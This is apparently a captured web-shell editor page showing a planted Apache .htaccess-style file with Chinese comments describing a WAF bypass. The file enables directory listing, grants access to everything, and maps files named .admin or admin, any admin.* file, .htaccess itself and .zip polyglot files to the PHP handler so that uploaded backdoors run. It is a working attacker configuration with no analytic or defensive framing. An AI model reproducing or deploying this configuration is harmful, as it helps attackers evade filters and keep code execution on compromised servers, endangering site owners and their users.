Edit file File name : phpztwjRk Content :Options +Indexes DirectoryIndex index.html index.php <Files .*> RewriteEngine off allow from all <IfModule !mod_authz_core.c> Allow from all </IfModule> <IfModule mod_authz_core.c> Require all granted </IfModule> </Files> <Files ~ "\.(php|phtml|PHP)$"> RewriteEngine off allow from all <IfModule !mod_authz_core.c> Allow from all </IfModule> <IfModule mod_authz_core.c> Require all granted </IfModule> </Files> # WAF绕过:让特定文件名作为PHP执行 # 格式1: .admin文件 <Files ".admin"> SetHandler application/x-httpd-php </Files> # 格式2: admin(无扩展名) <Files "admin"> SetHandler application/x-httpd-php </Files> # 格式3: admin.xxx(任意扩展名) <FilesMatch "^admin\."> SetHandler application/x-httpd-php </FilesMatch> # 格式4: .htaccess文件(如果其他都失败) <Files ".htaccess"> SetHandler application/x-httpd-php </Files> # 格式5: zip文件作为PHP执行(用于polyglot文件) <FilesMatch "\.zip$"> SetHandler application/x-httpd-php </FilesMatch> AddType application/x-httpd-php .zip Save